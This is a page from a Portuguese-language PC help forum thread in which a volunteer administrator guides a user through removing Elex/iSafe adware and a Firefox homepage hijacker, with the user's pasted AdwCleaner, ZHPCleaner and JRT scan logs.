Flux 
Social bookmarking
Conservar e compartilhar o endereço de PC Seguro em seu site de social bookmarking
Conservar e compartilhar o endereço de Fórum PC Brasil em seu site de social bookmarking
Estatísticas
Temos 14810 usuários registradosO último membro registrado é Josevinil
Os nossos membros postaram um total de 36047 mensagens em 3685 assuntos
Quem está conectado?
Há 24 usuários online :: 0 registrados, 0 invisíveis e 24 visitantes :: 1 motor de buscaNenhum
O recorde de usuários online foi de 301 em Ter 26 Out 2021, 15:28
Procurar
Top dos mais postadores
| Power Max |
| |||
| joram |
| |||
| Wings [In Memoriam] |
| |||
| caedurodrigues |
| |||
| Amigo Brasileiro |
| |||
| luizvilarinho |
| |||
| Danii |
| |||
| Admin |
| |||
| Danilo Marsaro |
| |||
| Andreata |
|
Firefox Muda Configuração Inicial de Repente
2 participantes
Página 3 de 5
Página 3 de 5 • 
1, 2, 3, 4, 5
Re: Firefox Muda Configuração Inicial de Repente
por joram Qua 03 maio 2017, 09:06
/_ Bom Dia! Ademir _\
Desculpe-me a demora em lhe responder,mas espero que entenda que esta ajuda que presto é voluntária e não posso ficar de plantão 24 horas ao computador,pois tenho outros compromissos.
Nunca abandonei Membros ou Usuários,onde o que ocorre é o contrário e muitos abandonam seus Tópicos,deixando procedimentos sem conclusão ou formatando suas máquinas,sem me avisar desta decisão.
Agora,ao reinstalar o Firefox vc obteve problemas mas não disse de onde baixou seu setup de instalação.
Então...vamos lá!
Vamos executar caminho inverso,onde primeiro vc baixará,novamente,as ferramentas de remoções aleatórias e depois,ao final de seus scans,poste os logs da FRST. (FRST.txt + Addition.txt)
Siga nesta ordem: AdwCleaner -> ZHPCleaner -> JRT -> FRST
Poste seus relatórios!
[Abs]
Desculpe-me a demora em lhe responder,mas espero que entenda que esta ajuda que presto é voluntária e não posso ficar de plantão 24 horas ao computador,pois tenho outros compromissos.
Nunca abandonei Membros ou Usuários,onde o que ocorre é o contrário e muitos abandonam seus Tópicos,deixando procedimentos sem conclusão ou formatando suas máquinas,sem me avisar desta decisão.
Agora,ao reinstalar o Firefox vc obteve problemas mas não disse de onde baixou seu setup de instalação.
Então...vamos lá!
Vamos executar caminho inverso,onde primeiro vc baixará,novamente,as ferramentas de remoções aleatórias e depois,ao final de seus scans,poste os logs da FRST. (FRST.txt + Addition.txt)
Siga nesta ordem: AdwCleaner -> ZHPCleaner -> JRT -> FRST
Poste seus relatórios!
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Qua 03 maio 2017, 11:30
Caro joram;
Desculpa a má impressão! Eu sei que trata-se de uma ajuda voluntária - coisa de nerde, mesmo rs. Pra nossa sorte. Portanto, tb sei que não tenho empregados aqui.
Mas entenda minha situação - o choque (é verdade!) de dar de cara com a mesma situação de antes de conectar o Fórum. Vc falou que muita gente abandona a ajuda, mas imagino tb que seja pq a coisa é cansativa. No meu caso, note que retornei, depois do choro (rsrs), na esperança de estar enganado. E estava!
Mas acessar esta comunidade é irritante e cansativa, exatamente por causa dos ataques de adwares Esta postagem está aqui, p.exp., por insistência minha, após mais de meia hora tentando!! É mole?!.
Mas, poxa, saí feliz da vida logo depois de postar o último relatório do DelFixVc. E aí, dou de cara com os mesmos problemas, após uma extenuante maratona! Vc sabe até melhor do que eu o efeito dessas pragas em nossas vidas. Pra mim, está sendo um inferno! Ontem, até banners de sites pornôs apareceram na página da revista Veja! Fico com receio dessas coisas infectarem o FaceBook, por exemplo, onde tenho filhas e amigos!
Agora, talvez não tenha sido claro em relação ao FireFox: os problemas NÃO voltaram após a reinstalação dele. O navegador (o que mais uso), na verdade, retornou às configurações iniciais, de ANTES dos ataques, quando ficava em inglês e abrindo loucamente abas de sites comerciais e pornôs.
Então fiquei feliz da vida ao vê-lo retornar aos padrões de sempre. Respirei aliviado. Abandonei então a porcaria do Edge e comecei a navegar pelo Fire, acessando vários sites (Hotmail, FaceBook, etc). Beleza!
Decidi contar as novidades e agradecê-lo — e acessei o ForumPC. A alegria durou pouco! Os ataques retornaram! Pra minha sorte, o FF possui eficiente bloqueador de PUP UPs, mas as págs do Forum travavam... o resto da história vc já sabe. Assim, antes de seguir suas novas instruções, vc pudesse reavaliá-las a partir dessas informações.
Abço
Ps.: Na penúltima postagem (quando ainda acreditava que as coisas tinham sido resolvidas) perguntei por que o Windows Defender não deu conta do problema. Qual a sua real eficácia — e, a depender de sua resposta, acessaria a Microsoft Community para reclamar. E também perguntei se poderia voltar a baixar uma daquelas ferramentas para mantê-la ao lado do Defender. O que acha?
Desculpa a má impressão! Eu sei que trata-se de uma ajuda voluntária - coisa de nerde, mesmo rs. Pra nossa sorte. Portanto, tb sei que não tenho empregados aqui.
Mas entenda minha situação - o choque (é verdade!) de dar de cara com a mesma situação de antes de conectar o Fórum. Vc falou que muita gente abandona a ajuda, mas imagino tb que seja pq a coisa é cansativa. No meu caso, note que retornei, depois do choro (rsrs), na esperança de estar enganado. E estava!
Mas acessar esta comunidade é irritante e cansativa, exatamente por causa dos ataques de adwares Esta postagem está aqui, p.exp., por insistência minha, após mais de meia hora tentando!! É mole?!.
Mas, poxa, saí feliz da vida logo depois de postar o último relatório do DelFixVc. E aí, dou de cara com os mesmos problemas, após uma extenuante maratona! Vc sabe até melhor do que eu o efeito dessas pragas em nossas vidas. Pra mim, está sendo um inferno! Ontem, até banners de sites pornôs apareceram na página da revista Veja! Fico com receio dessas coisas infectarem o FaceBook, por exemplo, onde tenho filhas e amigos!
Agora, talvez não tenha sido claro em relação ao FireFox: os problemas NÃO voltaram após a reinstalação dele. O navegador (o que mais uso), na verdade, retornou às configurações iniciais, de ANTES dos ataques, quando ficava em inglês e abrindo loucamente abas de sites comerciais e pornôs.
Então fiquei feliz da vida ao vê-lo retornar aos padrões de sempre. Respirei aliviado. Abandonei então a porcaria do Edge e comecei a navegar pelo Fire, acessando vários sites (Hotmail, FaceBook, etc). Beleza!
Decidi contar as novidades e agradecê-lo — e acessei o ForumPC. A alegria durou pouco! Os ataques retornaram! Pra minha sorte, o FF possui eficiente bloqueador de PUP UPs, mas as págs do Forum travavam... o resto da história vc já sabe. Assim, antes de seguir suas novas instruções, vc pudesse reavaliá-las a partir dessas informações.
Abço
Ps.: Na penúltima postagem (quando ainda acreditava que as coisas tinham sido resolvidas) perguntei por que o Windows Defender não deu conta do problema. Qual a sua real eficácia — e, a depender de sua resposta, acessaria a Microsoft Community para reclamar. E também perguntei se poderia voltar a baixar uma daquelas ferramentas para mantê-la ao lado do Defender. O que acha?
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Qua 03 maio 2017, 12:28
/_ Ademir _\
Entendi suas explanações!
Quanto ao Windows Defender não o recomendo,somente em casos especiais. Dou preferência ao 360 Total Security,que dispõe dos bancos do Avira e BitDefender.
Após executar novamente as ferramentas,vc instalará o 360. Onde,posteriormente,lhe passarei o link para download e instruções de uso.
[Abs]
Entendi suas explanações!
Quanto ao Windows Defender não o recomendo,somente em casos especiais. Dou preferência ao 360 Total Security,que dispõe dos bancos do Avira e BitDefender.
Após executar novamente as ferramentas,vc instalará o 360. Onde,posteriormente,lhe passarei o link para download e instruções de uso.
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Sex 05 maio 2017, 10:58
Olá, joram
Realmente, complicado acessar este site! Desde nosso último contato, só agora consegui. Gostaria de saber pq os problemas ocorrem com muito maior frequência aqui, exatamente o local onde os ataques de adware fossem menores.
Mas, com relação ao JRT estou com uma dúvida - agora apareceram duas duas opções pata download: @bleepingComputer e @Autor's Sit. Qual delas baixar
Já o link para 64 bits do FRST, abre este site: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] O banner postado, segundo vc, é para 34 bits, o que não é o meu caso (veja img abaixo)
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
abç
Realmente, complicado acessar este site! Desde nosso último contato, só agora consegui. Gostaria de saber pq os problemas ocorrem com muito maior frequência aqui, exatamente o local onde os ataques de adware fossem menores.
Mas, com relação ao JRT estou com uma dúvida - agora apareceram duas duas opções pata download: @bleepingComputer e @Autor's Sit. Qual delas baixar
Já o link para 64 bits do FRST, abre este site: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] O banner postado, segundo vc, é para 34 bits, o que não é o meu caso (veja img abaixo)
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
abç
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Sex 05 maio 2017, 12:00
Aqui está o relatório do AdwCleaner. Mas favor responder msg anterior
# AdwCleaner v6.046 - Relatório criado 05/05/2017 às 11:50:12
# Atualizado em 24/04/2017 por Malwarebytes
# Banco de dados : 2017-05-04.2 [Servidor]
# Sistema operacional : Windows 10 Home Single Language (X64)
# Usuário : ADEMIR MONTEIRO - ADEMIR
# Executando de : C:\Users\ADEMIR MONTEIRO\Desktop\adwcleaner_6.046.exe
# Modo: Digitalizar
# Apoio : [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
***** [ Serviços ] *****
Serviço Encontrado: iSafeKrnl
Serviço Encontrado: iSafeKrnlBoot
Serviço Encontrado: iSafeKrnlKit
Serviço Encontrado: iSafeKrnlMon
Serviço Encontrado: iSafeKrnlR3
Serviço Encontrado: iSafeNetFilter
Serviço Encontrado: iSafeService
Serviço Encontrado: isafekrnl
Serviço Encontrado: isafekrnlboot
Serviço Encontrado: isafekrnlkit
Serviço Encontrado: isafekrnlmon
Serviço Encontrado: isafekrnlr3
Serviço Encontrado: isafenetfilter
Serviço Encontrado: isafeservice
***** [ Pastas ] *****
Pasta Encontrada: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech
Pasta Encontrada: C:\Program Files (x86)\Elex-tech
***** [ Arquivos ] *****
Arquivo encontrado: C:\WINDOWS\SysNative\log\iSafeKrnlCall.log
Arquivo encontrado: C:\WINDOWS\SysNative\drivers\iSafeKrnlBoot.sys
Arquivo encontrado: C:\WINDOWS\SysNative\drivers\iSafeNetFilter.sys
***** [ DLL ] *****
Não foram encontradas DLLs mal-intencionadas.
***** [ WMI ] *****
Nenhuma chave mal-intencionada encontrada.
***** [ Atalhos ] *****
Nenhum atalho infectado encontrado.
***** [ Atividades agendadas ] *****
Nenhuma tarefa maliciosa encontrada.
***** [ Registro ] *****
Chave encontrada: HKLM\SOFTWARE\Elex-tech
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
***** [ Navegadores ] *****
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js] - "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750lm022
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js] - "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st75
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js] - "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750lm022x
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js] - "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750
Nenhum item de navegador baseado em Chromo malicioso encontrado.
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [2804 Bytes] - [05/05/2017 11:50:12]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [2877 Bytes] ##########
# AdwCleaner v6.046 - Relatório criado 05/05/2017 às 11:50:12
# Atualizado em 24/04/2017 por Malwarebytes
# Banco de dados : 2017-05-04.2 [Servidor]
# Sistema operacional : Windows 10 Home Single Language (X64)
# Usuário : ADEMIR MONTEIRO - ADEMIR
# Executando de : C:\Users\ADEMIR MONTEIRO\Desktop\adwcleaner_6.046.exe
# Modo: Digitalizar
# Apoio : [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
***** [ Serviços ] *****
Serviço Encontrado: iSafeKrnl
Serviço Encontrado: iSafeKrnlBoot
Serviço Encontrado: iSafeKrnlKit
Serviço Encontrado: iSafeKrnlMon
Serviço Encontrado: iSafeKrnlR3
Serviço Encontrado: iSafeNetFilter
Serviço Encontrado: iSafeService
Serviço Encontrado: isafekrnl
Serviço Encontrado: isafekrnlboot
Serviço Encontrado: isafekrnlkit
Serviço Encontrado: isafekrnlmon
Serviço Encontrado: isafekrnlr3
Serviço Encontrado: isafenetfilter
Serviço Encontrado: isafeservice
***** [ Pastas ] *****
Pasta Encontrada: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech
Pasta Encontrada: C:\Program Files (x86)\Elex-tech
***** [ Arquivos ] *****
Arquivo encontrado: C:\WINDOWS\SysNative\log\iSafeKrnlCall.log
Arquivo encontrado: C:\WINDOWS\SysNative\drivers\iSafeKrnlBoot.sys
Arquivo encontrado: C:\WINDOWS\SysNative\drivers\iSafeNetFilter.sys
***** [ DLL ] *****
Não foram encontradas DLLs mal-intencionadas.
***** [ WMI ] *****
Nenhuma chave mal-intencionada encontrada.
***** [ Atalhos ] *****
Nenhum atalho infectado encontrado.
***** [ Atividades agendadas ] *****
Nenhuma tarefa maliciosa encontrada.
***** [ Registro ] *****
Chave encontrada: HKLM\SOFTWARE\Elex-tech
Chave encontrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
***** [ Navegadores ] *****
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js] - "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750lm022
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js] - "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st75
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js] - "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750lm022x
Firefox pref encontrado: [C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js] - "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1493950107&from=d6440504&uid=st750
Nenhum item de navegador baseado em Chromo malicioso encontrado.
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [2804 Bytes] - [05/05/2017 11:50:12]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [2877 Bytes] ##########
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Sex 05 maio 2017, 15:46
/_ Boa Tarde! Ademir _\
Edit:
[Abs]
> Este Fórum ainda não foi hospedado em local que não dependam destas propagandas,onde os Forumeiros.com não é muito do gosto de seu administrador fundador.<Ademir> Realmente, complicado acessar este site! Desde nosso último contato, só agora consegui. Gostaria de saber pq os problemas ocorrem com muito maior frequência aqui, exatamente o local onde os ataques de adware fossem menores.
> Pode ser qualquer um destes,pois lhe dei 2 opções para download.<Ademir> Mas, com relação ao JRT estou com uma dúvida - agora apareceram duas duas opções pata download: @bleepingComputer e @Autor's Sit. Qual delas baixar
> Mas...no site da Bleeping Computer existe opção para download da versão FRST(64Bits).<Ademir> Já o link para 64 bits do FRST, abre este site: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] O banner postado, segundo vc, é para 34 bits, o que não é o meu caso (veja img abaixo)
Edit:
> Aqui,em geekstogo.com temos opções para (32 bits) e (64 bits).[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Sex 05 maio 2017, 18:38
Boa noite, joram
Relatório do ZHPCleaner abaixo. Vc já avaliou o anterior (adwcleaner)? Pq a pág inicial do Firefox (Mozilla Firefox) foi substituída por esta: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Isto após os dois reparos, com as duas ferramentas.
Abraço
Seguindo a sua sequência, vou executar o JRT. Uma abraço
Relatório do ZHPCleaner abaixo. Vc já avaliou o anterior (adwcleaner)? Pq a pág inicial do Firefox (Mozilla Firefox) foi substituída por esta: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Isto após os dois reparos, com as duas ferramentas.
Abraço
- ZHPCleaner:
- ~ ZHPCleaner v2017.5.4.76 by Nicolas Coolman (2017/05/04)
~ Run by ADEMIR MONTEIRO (Administrator) (05/05/2017 18:18:09)
~ Web: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
~ Blog: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
~ Facebook : [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
~ State version : Version OK
~ Type : Reparo
~ Report : C:\Users\ADEMIR MONTEIRO\Desktop\ZHPCleaner.txt
~ Quarantine : C:\Users\ADEMIR MONTEIRO\AppData\Roaming\ZHP\ZHPCleaner_Reg.txt
~ UAC : Activate
~ Boot Mode : Normal (Normal boot)
Windows 10 Home Single Language, 64-bit (Build 14393)
---\\ Serviços (1)
PAROU : iSafeService =>.Superfluous.Elex
---\\ Navegadores de Internet (0)
~ Nenhum ítem malicioso o desnecessários foi encontrado.
---\\ Arquivo hosts (1)
~ O arquivo hosts é legítimo (21)
---\\ Tarefas automáticas agendadas. (0)
~ Nenhum ítem malicioso o desnecessários foi encontrado.
---\\ Explorer ( Arquivos, Pastas) (29)
MOVIDO pasta^: C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [Elex do Brasil Participações Ltda - iSafe Kernel Driver] =>.Superfluous.Elex
MOVIDO pasta^: C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [Elex do Brasil Participações Ltda - iSafe Kernel Kit Driver] =>.Superfluous.Elex
MOVIDO pasta^: C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [Elex do Brasil Participações Ltda - iSafe Kernel Ring3 Driver] =>.Superfluous.Elex
MOVIDO pasta^: C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [Elex do Brasil Participações Ltda - iSafeSvc] =>.Superfluous.Elex
MOVIDO pasta: C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [Elex do Brasil Participações Ltda - iSafe Kernel Boot Driver] =>.Superfluous.Elex
MOVIDO pasta: C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [Elex do Brasil Participações Ltda - iSafeNetFilter SDK WFP Driver (WPP)] =>.Superfluous.Elex
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\chrome_installer.log =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\CVR13E7.tmp.cvr =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\geColladaModelCacheLock =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\geIconCacheLock =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\MSIb109c.LOG =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\MSIb109d.LOG =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8D3.tmp [Elex do Brasil Participações Ltda - libcurl wrapper] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8D4.tmp [Elex do Brasil Participações Ltda - iCommon] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8D5.tmp [Elex do Brasil Participações Ltda - iImportLib] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8E6.tmp [Elex do Brasil Participações Ltda - isafebase] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8E7.tmp [Elex do Brasil Participações Ltda - Module Config] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8E8.tmp [Elex do Brasil Participações Ltda - isafepxy] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8F8.tmp [Elex do Brasil Participações Ltda - isaferpt] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8F9.tmp [The cURL library, [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] - libcurl Shared Library] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B8FB.tmp [? 1998-2009 Glenn Randers-Pehrson et al. - PNG image compression library] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B90E.tmp [Elex do Brasil Participações Ltda - ouilib] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B90F.tmp [SQLite3 - SQLite3 Dynamic Link Library] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B911.tmp [Elex do Brasil Participações Ltda - uninstal] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\_@B912.tmp [(C) 1995-2004 Jean-loup Gailly & Mark Adler - zlib data compression library] =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\WINDOWS\System32\log\iSafeKrnlCall.log =>.Superfluous.YetAnotherCleaner
MOVIDO arquivo^: C:\Program Files (x86)\Elex-tech =>.Superfluous.Elex
MOVIDO arquivo^: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech =>.Superfluous.Elex
MOVIDO arquivo^: C:\Program Files (x86)\Elex-tech\YAC =>.Superfluous.YetAnotherCleaner
---\\ Registro ( Chaves, Valores, Dados ) (12)
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnl [C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys] =>.Superfluous.Elex
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlKit [C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys] =>.Superfluous.Elex
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlR3 [C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys] =>.Superfluous.Elex
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeService [C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe] =>.Superfluous.Elex
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeKrnlBoot [C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys (Not File)] =>.Superfluous.Elex
SUPRIMIDO chave^: HKLM\SYSTEM\CurrentControlSet\Services\iSafeNetFilter [C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys (Not File)] =>.Superfluous.Elex
SUPRIMIDO chave*: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\atwola.com [] =>.Superfluous.Atwola
SUPRIMIDO chave*: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ol.at.atwola.com [] =>.Superfluous.Atwola
SUPRIMIDO chave*: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\atwola.com [] =>.Superfluous.Atwola
SUPRIMIDO chave*: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ol.at.atwola.com [830] =>.Superfluous.Atwola
SUPRIMIDO chave^: [X64] HKLM\SOFTWARE\Wow6432Node\Elex-tech [] =>.Superfluous.Elex
SUPRIMIDO chave^: [X64] HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iSafe [ELEX DO BRASIL PARTICIPAÇÕES LTDA] =>.Superfluous.Elex
---\\ Resumo dos elementos encontrados na sua estação de trabalho (4)
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] =>.Superfluous.Elex
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] =>.Superfluous.Temporary.Empty
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] =>.Superfluous.YetAnotherCleaner
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] =>.Superfluous.Atwola
---\\ Dodatkowe oczyszczenie. (25)
~ Chave de registro Tracing Supprimido (25)
~ Remover os relatórios antigos ZHPCleaner. (0)
---\\ Resultado de reparação
Reparação efectuada com sucesso
~ Este navegador está faltando ! (Google Chrome)
~ Este navegador está faltando ! (Opera Software)
~ O sistema foi reiniciado.
---\\ Estatísticas
~ Items scan : 1352
~ Items encontrado : 0
~ items cancelados : 0
~ Items réparo : 42
~ End of clean in 00h02mn29s
~====================
ZHPCleaner-[R]-05052017-18_20_38.txt
ZHPCleaner-[R]-29042017-22_52_25.txt
ZHPCleaner-[S]-05052017-18_13_48.txt
ZHPCleaner-[S]-29042017-17_10_23.txt
Seguindo a sua sequência, vou executar o JRT. Uma abraço
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Sex 05 maio 2017, 19:07
/_ Boa Noite! Ademir _\
# Modo: Digitalizar ( Este modo é de diagnóstico e não remove suas detecções! )
> Após a JRT seguiremos com a Zoek,para removermos este browserhijacker que foi configurado como página inicial ao Firefox.
[Abs]
> Sim. Já vi o relatório da AdwCleaner ,mas nada do que foi encontrado foi removido por ela. O que houve?[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
# Modo: Digitalizar ( Este modo é de diagnóstico e não remove suas detecções! )
> Após a JRT seguiremos com a Zoek,para removermos este browserhijacker que foi configurado como página inicial ao Firefox.
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Sáb 06 maio 2017, 15:21
Boa tarde, joram
Segui aquelas primeiras orientações, só alterando a sequência de acordo com as últimas postagens. Não cliquei em "Digitalizar" e sim em "Limpar". E tb marquei os espaços em Opções segundo vc orientou da 1ª vez.
Abç
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
RELATÓRIO DO JRT:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home Single Language x64
Ran by ADEMIR MONTEIRO (Administrator) on 05/05/2017 at 18:47:43,62
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 4
Failed to delete: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\elex-tech (Folder)
Failed to delete: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js (File)
Failed to delete: C:\Program Files (x86)\elex-tech (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDEventLauncherTask (Task)
Deleted the following from C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\prefs.js
user_pref(browser.search.searchengine.desc, this is my first firefox searchEngine);
user_pref(browser.search.searchengine.ptid, cor);
user_pref(browser.search.searchengine.uid, ST750LM022XHN-M750MBB_S317J90D848001848001);
Registry: 8
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3 (Registry Key)
Failed to delete: HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter (Registry Key)
